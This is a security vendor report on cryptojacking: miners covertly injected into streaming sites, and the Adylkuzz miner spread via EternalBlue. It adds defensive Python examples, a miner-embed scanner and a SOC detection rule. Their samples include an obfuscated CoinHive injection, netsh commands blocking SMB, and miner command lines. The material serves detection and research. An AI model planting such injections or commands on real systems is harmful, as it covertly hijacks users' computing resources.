Until recently, websites that provide free services earned almost all their revenue through advertisements. Is The Pirate Bay example a sign that cryptocurrency mining may soon take over as the main revenue source?
How does the rising popularity of cryptocurrency miners affect the cyber security landscape? In which cases is it a legitimate tool, and in which is it considered malware? In this report, we answer these questions.
The first cryptocurrency to gain popularity and trigger the growth of the market and of mining communities was BitCoin, the first decentralized coin. As time passed and BitCoin mining gained popularity, the computational resources required to stay in the game grew. The arrival of specialized hardware made it even harder for miners using personal computers, whether threat actors running malware or solo miners; at a certain point, mining BitCoin and other leading cryptocurrencies such as Ethereum became unprofitable once the cost of hardware and electricity was taken into account. New coins then entered the game. They required far less CPU power, as they were much less popular and were mined by much smaller communities. Some of them, such as Monero, tried to outgrow BitCoin by avoiding the coin's biggest flaw, the lack of privacy. Naturally, new cryptocurrencies led to new crypto miners, both tools for the mining community and malware.
The Birth of Crypto Miners, and Crypto Cyber Campaigns
The rising popularity of cryptocurrency, for both purchasing and mining, has led to significant growth of the mining community and the cryptocurrency market worldwide. These in turn have produced a new kind of tool used to generate revenue: crypto miners.
While the term 'crypto miner' refers to tools that are available online and can be used by the mining community, tools that malicious actors deploy on a machine after infecting it are called 'crypto mining malware'.
As with any new technology or advancement that has potential gain in it, the birth of cryptocurrencies also became fertile ground for financially motivated cyber actors. To avoid the cost of expensive hardware, cybercriminals infect numerous systems in order to consume the victims' CPU or GPU power and existing resources for crypto mining. Using different attack vectors, such as spam campaigns and exploit kits, they turn the infected machines into armies of cryptocurrency miners.
Cryptocurrency mining is a computationally intensive task that requires powerful resources from specialized hardware and dedicated processors, and incurs significant electricity costs and hardware investments. The BitCoin network generates a new block every ten minutes on average, regardless of the number of active miners, because the mining difficulty is periodically adjusted to the total hash rate. This means that new miners entering the game do not accelerate block production; they only raise the difficulty, so each miner's share of the reward shrinks.
As expected, the first cryptocurrency miners were designed to mine BitCoin and emerged in 2011, shortly after BitCoin began gaining attention and popularity. One such miner was the Otorun worm. The infamous Kelihos, one of the largest botnets, which was taken down by the FBI in April 2017, was also used for BitCoin mining. The recent development of dozens of new cryptocurrencies has led to a multitude of new crypto miners, each designed to mine a specific currency. All of them leverage their victims' computer resources, causing the infected machines to run abnormally slowly.
Miners for the 'Ethereum', 'Zcash' and 'Dogecoin' currencies can currently be observed in the wild, though some sources say that mining these currencies on personal computers, even with a large number of bots involved, is no longer profitable. Without a doubt, the top currency mined by threat actors these days is Monero (see Appendix).
Crypto miners' growing role in the threat landscape
Let's take another look at The Pirate Bay Monero miner case and review the concerning role of web-based crypto miners in the threat landscape.
Currently, websites that do not provide paid services rely on advertisements for revenue. Many websites are loaded with ads, which strongly affect the user experience and the accessibility of the actual content. Replacing the ads with a crypto miner that uses a limited percentage of the visitors' CPU power can be a good trade-off for website owners: it generates revenue for the owners and gives end users a less intrusive experience.
However, the security community must remain vigilant in light of such developments, as the operators of such miners have a clear interest in increasing the percentage of computer resources consumed, and perhaps even in leveraging their access to elevate their privileges over the users' machines.
The Pirate Bay case instantly made headlines and led to a stream of customer questions and complaints. An online search for similar cases yielded no results. Does this mean The Pirate Bay case is an outlier, or is it just one of many examples of a trend currently flying under the radar?
An investigation conducted by Check Point researchers reveals that cryptocurrency miners have knowingly been injected into some top websites, mostly media streaming and file sharing services, without notifying the users. According to our research, those miners regularly use as much as 65% of the end users' CPU power.
Example 1: Uptobox.com is a file hosting service ranked 70 in France and 672 globally according to Alexa. The website uses its visitors' CPU power to mine the Monero cryptocurrency without notification.
Example 2: Vidzi.tv is a video sharing service ranked 659 in the US and 788 globally. The website uses its visitors' CPU power to mine the Monero cryptocurrency without notification.
Using video streaming websites for mining is the ultimate way to consume clients' computer resources while remaining under the radar. Typically, users select their preferred content and watch the video, leaving the browser tab unattended for at least an hour. It's easy and convenient, and the top video streaming websites can generate substantial revenue for the operation's owners.
CPU usage of an ordinary laptop while accessing the video streaming service WatchFree.to, ranked 1,076 in the US and 1,625 globally by Alexa. The overall CPU usage of the machine while accessing the website is 69%.
The brains behind such an operation can be either the website owners themselves, who want to generate revenue without resorting to copious advertisements, or threat actors who inject code to enable mining activity across a popular website's user base.
uptostream.com is a video streaming service ranked 573 in France and 7,698 globally. This service mines Monero using its visitors' computer resources without notification.
When we examine how the cryptocurrency miner is integrated into the vidzi.tv page, we see a non-official method, one that differs from the embed CoinHive offers on its official website. This page was most likely compromised by malicious actors and surreptitiously injected with the miner.
The injection of the CoinHive Monero miner into vidzi.tv, using a non-official method
The examples presented above are only a few of the dozens of cases observed during one week of research in September 2017. Each of these examples demonstrates a different way of integrating the miner into the website. All of them consume a significant percentage of CPU power, yet only in some cases can the percentage and the number of threads be managed by the website owner. Some websites were found to be related to each other, which may imply an organized mining operation. In other cases, inactive domains that according to Alexa remain very popular were found to be mining cryptocurrency. This might mean that several other websites silently redirect their users to this page.
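The following scanner is an added example for this section, not code from the report or from Check Point's products. It checks a fetched page for the browser-miner embed discussed above: the CoinHive script URL and the `CoinHive.Anonymous` / `CoinHive.User` constructor are the service's own documented embed, and the `throttle` and `threads` options are the knobs a site owner has over CPU share and worker count. The extra hosts, the percent-encoding and base64 unwrapping, and the obfuscation heuristics are this example's assumptions about how a "non-official" injection hides itself; the two sample pages are constructed here, not captures from the sites named in the report.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import quote, unquote

# coinhive.min.js and the CoinHive.Anonymous / CoinHive.User constructors are
# the service's documented embed; "throttle" (0.0-1.0) is the fraction of time
# each worker thread idles and "threads" the number of workers. The host list
# and the obfuscation heuristics below are assumptions of this example.
MINER_HOSTS = ("coinhive.com", "coin-hive.com", "authedmine.com")
CONSTRUCTOR_RE = re.compile(r"CoinHive\.(Anonymous|User)\s*\(\s*['\"]([^'\"]+)['\"]")
THROTTLE_RE = re.compile(r"throttle\s*:\s*([0-9.]+)")
THREADS_RE = re.compile(r"threads\s*:\s*(\d+)")
# Wrappers commonly used to hide an injected script from a casual view-source.
OBFUSCATION_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(|eval\s*\(\s*atob\s*\(|String\.fromCharCode\s*\("
)


@dataclass
class MinerFinding:
    site_keys: List[str] = field(default_factory=list)
    script_hosts: List[str] = field(default_factory=list)
    throttle: Optional[float] = None
    threads: Optional[int] = None
    obfuscated: bool = False

    @property
    def cpu_budget(self) -> float:
        """Share of each worker's time spent hashing: 1 - throttle (the default throttle is 0)."""
        return 1.0 - (self.throttle or 0.0)


def _deobfuscate(text: str) -> str:
    """Unwrap unescape('%..') and atob('..') literals so the constructor call becomes visible."""
    text = re.sub(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)", lambda m: unquote(m.group(1)), text)

    def _b64(m):
        try:
            return base64.b64decode(m.group(1)).decode("utf-8", "replace")
        except ValueError:
            return m.group(0)

    return re.sub(r"atob\(\s*['\"]([^'\"]*)['\"]\s*\)", _b64, text)


def scan_html(html: str) -> Optional[MinerFinding]:
    """Return a MinerFinding if the page carries a miner embed, else None."""
    obfuscated = bool(OBFUSCATION_RE.search(html))
    text = _deobfuscate(html)
    hosts = [h for h in MINER_HOSTS if h in text]
    keys = [m.group(2) for m in CONSTRUCTOR_RE.finditer(text)]
    if not hosts and not keys:
        return None
    throttle = THROTTLE_RE.search(text)
    threads = THREADS_RE.search(text)
    return MinerFinding(
        site_keys=keys,
        script_hosts=hosts,
        throttle=float(throttle.group(1)) if throttle else None,
        threads=int(threads.group(1)) if threads else None,
        obfuscated=obfuscated,
    )


# Constructed samples (not captures from the sites named in the report).
# 1. The documented embed with a 30% throttle, as a site owner would add it.
OFFICIAL_EMBED = (
    '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
    "<script>var miner = new CoinHive.Anonymous('SITEKEY-EXAMPLE-1', {throttle: 0.3});"
    "miner.start();</script>"
)
# 2. An injected variant: the script tag is written via unescape() and the
#    constructor is hidden in base64, with four threads and no throttle.
_TAG = '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
_CALL = "var m = new CoinHive.Anonymous('SITEKEY-EXAMPLE-2', {threads: 4}); m.start();"
INJECTED_EMBED = (
    "<script>document.write(unescape('%s'));</script>" % quote(_TAG)
    + "<script>eval(atob('%s'));</script>" % base64.b64encode(_CALL.encode()).decode()
)
CLEAN_PAGE = "<html><body><p>No miner here.</p></body></html>"

if __name__ == "__main__":
    for name, page in (("official", OFFICIAL_EMBED), ("injected", INJECTED_EMBED), ("clean", CLEAN_PAGE)):
        print(name, scan_html(page))
```

The `obfuscated` flag is the practical discriminator from the text: a site owner who adds the miner deliberately has no reason to wrap it in `unescape`/`atob`, so an obfuscated embed with no throttle is the profile of a compromised page rather than a revenue experiment.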
The Case of the Adylkuzz Monero Miner
One of the most notable cryptocurrency miners of 2017 is Adylkuzz, malware that mines Monero on its victims' machines. While it may have been active in late April or early May, Adylkuzz notably emerged on May 15, 2017, only three days after the global spread of the WannaCry ransomware campaign began. Adylkuzz shares some similarities with WannaCry. It uses the EternalBlue exploit, which was made available to the public as part of the Shadow Brokers leak of NSA tools, to locate vulnerable machines and spread laterally within infected networks. It also uses the DoublePulsar backdoor to install its payload. Interestingly, an Adylkuzz infection shuts down SMB networking to prevent infection by other malware, so the Adylkuzz attack may have slowed the spread of WannaCry. The close proximity of these two large-scale campaigns and the publicity gained by WannaCry may have caused Adylkuzz attacks to be attributed to WannaCry. What we observed in Adylkuzz demonstrates that cryptocurrency miners are now using similar attack vectors and increasing their share of the cyber landscape.
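The two behaviours the paragraph attributes to Adylkuzz, a Monero miner starting and SMB being shut off on the same host shortly afterwards, are a useful correlation for a SOC, because either one alone is ambiguous (an admin may block port 445; a user may mine). The detection logic below is an added example, not a Check Point signature or telemetry. It assumes Sysmon-style process-creation events with `host`, `ts`, `image` and `cmdline` fields, assumes that the SMB shutdown is done with `netsh` (the page states only that SMB networking is shut down), and uses a constructed event set with placeholder paths, pool host and wallet.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List


def is_smb_block(cmdline: str) -> bool:
    """netsh ipsec/advfirewall command that blocks TCP 445 (assumed mechanism for "shutting down SMB")."""
    c = cmdline.lower()
    return "netsh" in c and "445" in c and ("ipsec" in c or "block" in c)


# Monero mining indicators: a stratum pool URL, the CPU-oriented cryptonight
# algorithm name, or a standard Monero address (95 base58 chars starting with '4').
POOL_RE = re.compile(r"stratum\+tcp://[\w.-]+:\d{2,5}", re.I)
MONERO_ADDR_RE = re.compile(r"\b4[1-9A-HJ-NP-Za-km-z]{94}\b")


def is_monero_miner(cmdline: str) -> bool:
    return bool(POOL_RE.search(cmdline) or MONERO_ADDR_RE.search(cmdline)
                or "cryptonight" in cmdline.lower())


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def classify(events: List[dict], window: timedelta = timedelta(minutes=10)) -> Dict[str, dict]:
    """Tag each process-creation event and rate every host that had at least one hit.

    high   = SMB blocked and a Monero miner started within `window` (the Adylkuzz pattern)
    medium = a Monero miner alone
    low    = SMB blocked alone (could be a legitimate hardening step)
    """
    hits = defaultdict(list)
    for e in events:
        tags = []
        if is_smb_block(e["cmdline"]):
            tags.append("smb_block")
        if is_monero_miner(e["cmdline"]):
            tags.append("monero_miner")
        if tags:
            hits[e["host"]].append((_ts(e["ts"]), tags, e))
    findings = {}
    for host, rows in hits.items():
        tagset = {t for _, tags, _ in rows for t in tags}
        severity = "medium" if "monero_miner" in tagset else "low"
        blocks = [ts for ts, tags, _ in rows if "smb_block" in tags]
        miners = [ts for ts, tags, _ in rows if "monero_miner" in tags]
        if any(abs(b - m) <= window for b in blocks for m in miners):
            severity = "high"
        findings[host] = {"severity": severity, "indicators": sorted(tagset),
                          "events": [e for _, _, e in sorted(rows, key=lambda r: r[0])]}
    return findings


# Constructed Sysmon-style events; paths, pool host and wallet are placeholders.
PLACEHOLDER_WALLET = "4" + "A" * 94
SAMPLE_EVENTS = [
    {"host": "ws-01", "ts": "2017-05-15T09:01:02Z", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh ipsec static add filter filterlist=block any=any protocol=tcp dstport=445"},
    {"host": "ws-01", "ts": "2017-05-15T09:01:05Z", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh ipsec static set policy name=p1 assign=y"},
    {"host": "ws-01", "ts": "2017-05-15T09:03:40Z", "image": r"C:\ProgramData\svc\msvc.exe",
     "cmdline": f"msvc.exe -a cryptonight -o stratum+tcp://pool.example.invalid:3333 -u {PLACEHOLDER_WALLET} -p x"},
    {"host": "ws-02", "ts": "2017-05-15T09:02:00Z", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall show allprofiles"},
    {"host": "ws-03", "ts": "2017-05-15T11:30:00Z", "image": r"C:\Users\a\AppData\Local\Temp\xm.exe",
     "cmdline": "xm.exe -o stratum+tcp://pool.example.invalid:5555 -u user -p x"},
    {"host": "ws-04", "ts": "2017-05-15T12:00:00Z", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall firewall add rule name=NoSMB dir=in action=block protocol=TCP localport=445"},
]

if __name__ == "__main__":
    for host, f in classify(SAMPLE_EVENTS).items():
        print(host, f["severity"], f["indicators"])
```

The time window matters: the SMB block is the miner's self-protection step, so it lands minutes, not days, after the drop. A wide window would merge an unrelated hardening change with a later miner and inflate the severity.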
An examination of the malware's infection statistics in the Check Point ThreatCloud shows that Adylkuzz had a clear spike in its attack rate right when it first emerged, in parallel to the WannaCry campaign. It is still active.
Adylkuzz Malware Activity: the graph presents the Adylkuzz malware's attack rate as of May 15, 2017
As the WannaCry ransomware and Adylkuzz miner campaigns, which use similar tools and mechanisms, began at the same time, they are believed to share similar targets. The top countries attacked by WannaCry include Russia, Ukraine, India and Taiwan.
Now, let's examine the top countries infected by the Adylkuzz malware:
As shown above, Adylkuzz targets are spread all over the world, with no clear orientation toward a specific region.
WannaCry had no predefined targets. The ransomware spread to random class C IP ranges, looking for vulnerable public-facing SMB ports against which it could use the EternalBlue exploit. We therefore estimate that Adylkuzz spread in a similar way.
According to CNBC, as of August 2017, the cryptocurrency market was worth about $141 billion. While BitCoin was the first prominent cryptocurrency accepted by online markets and used by cybercriminals, today dozens of cryptocurrencies are widely used both for legitimate purposes and by threat actors for illegitimate and often fraudulent purposes.
The popularity of the various currencies among cryptocurrency miners is determined mostly by the profitability of mining the coin. As the use of a digital currency rises, so does the demand to mine it. This is why in recent months we have seen an increase in the number of crypto mining malware campaigns making headlines.
The Adylkuzz campaign's use of EternalBlue and DoublePulsar highlights another growing trend: crypto mining malware leveraging attack tools and vectors used by other malware and threat actors.
As the public is not yet fully aware of the prevalence of this new malware type, it is often harder to detect, as was the case with Adylkuzz and WannaCry. We have no doubt that a new, silent yet significant actor has quietly entered the threat landscape, letting threat actors monetize while victims' endpoints and networks suffer latency and decreased performance. This new threat is here to stay.
Check Point NGTP and NGTX customers are protected against infection by crypto miners and against the harmful consequences of their mining activity.
To learn more about bitcoins and cryptocurrencies and understand whether your cyber security may be at risk, download our guide “Cryptocurrencies: How Safe are They?”
Background for this research
Appendix 1 – BitCoin and other Cryptocurrencies
A cryptocurrency is a digital asset, secured by cryptography, that is used as a medium of exchange. It uses cryptography both to protect the data that represents a unit of currency and to control the creation of additional units. New units are created in a process called mining, which is based on mathematical proof of work and on cryptographic hash algorithms.
In contrast to physical money, cryptocurrencies are not issued and managed by a central authority. They are decentralized: organized and managed by a peer-to-peer network that maintains a shared ledger, the blockchain, which records all verified transactions.
While it wasn't the first ever digital coin, BitCoin is the first decentralized cryptocurrency. It was created in 2009 with the intention of becoming a public currency independent of any central authority or high transaction fees. In July 2010, a BitCoin was worth 6 cents. As of September 2017, a single BitCoin is worth $4,950, an increase of 8,249,900%.
BitCoin mining is the process by which transactions are verified and added to the blockchain, and also the means through which new BitCoins are released. Anyone with internet access can participate in mining. Currently, an individual miner would take approximately 98 years to mine a BitCoin block (12.5 BTC at the current block reward), because the mining difficulty limits the rate at which BitCoins are created. Therefore, several pools combine their members' computational resources to mine a single BitCoin block and share the reward.
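The two claims about difficulty above, that the network keeps producing a block every ten minutes no matter how many miners join (stated earlier in the report) and that an individual miner therefore needs pooled resources to see a block, follow from one mechanism: the proof-of-work target is retargeted against the observed block interval. The simulation below is an added illustration, not BitCoin's code; it keeps the real search (brute-force nonces until a SHA-256 digest falls under the target) but shrinks the numbers (about 1,000 hashes per block, 128 blocks per difficulty epoch instead of 2,016) and simulates wall-clock time as attempts divided by hashrate, so "more miners" shows up as a higher hashrate. The clamp to a factor of four per epoch mirrors BitCoin's rule; the initial target and epoch length are this example's choices.

```python
import hashlib
from typing import Dict, List, Tuple

EXPECTED_BLOCK_SECONDS = 600        # BitCoin aims at one block per ten minutes
BLOCKS_PER_EPOCH = 128              # difficulty epoch (BitCoin uses 2016; shortened for the demo)
MAX_TARGET = 2**256 - 1
INITIAL_TARGET = 2**256 // 1000     # about 1,000 hashes per block at the start (demo value)


def block_hash(prev_hash: str, nonce: int) -> str:
    """Toy block header: previous hash plus nonce, hashed once with SHA-256."""
    return hashlib.sha256(f"{prev_hash}:{nonce}".encode()).hexdigest()


def mine(prev_hash: str, target: int) -> Tuple[int, str]:
    """Brute-force nonces until the digest, read as an integer, is at or under the target."""
    nonce = 0
    while True:
        digest = block_hash(prev_hash, nonce)
        if int(digest, 16) <= target:
            return nonce, digest
        nonce += 1


def retarget(target: int, elapsed_seconds: float) -> int:
    """Scale the target by actual/expected epoch time, clamped to a factor of 4 either way."""
    expected = BLOCKS_PER_EPOCH * EXPECTED_BLOCK_SECONDS
    clamped = max(expected // 4, min(expected * 4, int(round(elapsed_seconds))))
    return min(MAX_TARGET, target * clamped // expected)


def simulate(hashrates: List[float]) -> List[Dict]:
    """Mine one epoch per entry in `hashrates` (total network hashes per simulated second).

    Returns, per epoch, the target in force, the average simulated block time and the
    mined (digest, target) pairs, so the caller can verify every block against its target.
    """
    target, prev_hash, history = INITIAL_TARGET, "genesis", []
    for epoch, hashrate in enumerate(hashrates):
        elapsed, blocks = 0.0, []
        for _ in range(BLOCKS_PER_EPOCH):
            nonce, digest = mine(prev_hash, target)
            elapsed += (nonce + 1) / hashrate      # simulated seconds spent on this block
            blocks.append((digest, target))
            prev_hash = digest
        history.append({"epoch": epoch, "hashrate": hashrate, "target": target,
                        "avg_block_seconds": elapsed / BLOCKS_PER_EPOCH, "blocks": blocks})
        target = retarget(target, elapsed)         # applied from the next epoch on
    return history


BASE_HASHRATE = 1000 / EXPECTED_BLOCK_SECONDS   # tuned so epoch 0 averages about 600 s per block

if __name__ == "__main__":
    # Epoch 1 doubles the network hashrate (new miners join); epoch 2 keeps it there.
    for h in simulate([BASE_HASHRATE, 2 * BASE_HASHRATE, 2 * BASE_HASHRATE]):
        print(f"epoch {h['epoch']}: hashrate x{h['hashrate'] / BASE_HASHRATE:.0f}, "
              f"avg block {h['avg_block_seconds']:.0f}s, "
              f"target/initial {h['target'] / INITIAL_TARGET:.2f}")
```

Doubling the hashrate roughly halves the block time for one epoch, after which the target halves and the interval returns to about 600 seconds. The individual miner's expected hashes per block have doubled; the network's block rate has not changed, which is exactly why solo mining becomes hopeless and pools form.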
A BitCoin wallet is pseudonymous: it is not linked to a name, address or any other personal identification. However, every transaction ever made with BitCoin is stored in the blockchain and is publicly available. While the owner's identity remains hidden, anyone can tell how many BitCoins are stored in a specific wallet at any given moment.
While BitCoin is still the most famous cryptocurrency, new digital currencies are constantly created and made as accessible to developers as possible. Some of them, such as 'Litecoin', 'Monero' and 'Ethereum', are already heavily traded online, and hundreds of others are used by small communities.
Digital currency is increasingly used to purchase products online, as the purchase is made quickly, without delays or intermediary charges. Another big advantage of cryptocurrency lies in its security: the user's credentials are not exposed in the process, so fraud and identity theft are much harder to carry out. These qualities, meant to protect the end user, make cryptocurrency ideal for cybercriminals, and indeed most ransomware demands payment in BitCoin. Some of them obfuscate the transaction even further, as observed in the case of the Cerber ransomware.
Cerber Bitcoin Flow: the transaction involves a BitCoin mixing service to avoid identification of the BitCoin wallets used by the author and by the ransomware's affiliates.
Appendix 3 – The Monero cryptocurrency
Looking back at the biggest crypto mining campaigns carried out during 2017 so far, the vast majority involved Monero miners. Major campaigns include:
- January: a Terror Exploit Kit campaign that distributed a Monero cryptocurrency miner
- June: a campaign targeting Linux machines that leveraged a vulnerability in Samba installations to distribute a Monero miner dubbed 'cpuminer' or 'EternalMiner', due to its proximity to the WannaCry ransomware
- August: a campaign targeting Mac users via a cheating app, vHook, which distributed a Monero miner dubbed Pwnet
The Monero cryptocurrency was created in April 2014. In September of that year, it was the victim of an attack that leveraged a flaw in the code of the protocol it uses. Monero experienced rapid growth in market capitalization in 2016, when it was adopted by the AlphaBay market, formerly the largest market on the dark web. Monero has been the subject of growing interest lately, and thus more and more Monero miners, including 'CoinHive', the miner used by The Pirate Bay, are now offered on online markets.
The reason for Monero's popularity is first of all its technology. Monero uses a protocol called 'CryptoNote', which several other cryptocurrencies use as well, and a proof-of-work algorithm called 'CryptoNight'. This algorithm is designed to run fast on personal computers and laptop CPUs, as opposed to the algorithms used by many other coins, which only run well on custom-made mining chips. Additionally, a Monero block is produced approximately every two minutes and has an adaptive block size limit, which means that the network can handle an increase in transaction volume without delaying a user who attempts an instant transaction. A BitCoin block, in contrast, is produced approximately every ten minutes and has a maximum size. If there is no room in the block, the transaction must either wait or the user must increase the transaction fee. Lastly, Monero is considered a secure and untraceable coin. Unlike BitCoin, the amount of coins stored in a Monero wallet is not visible to the public.
Check Point customers are protected against this threat with the following IPS protection (link):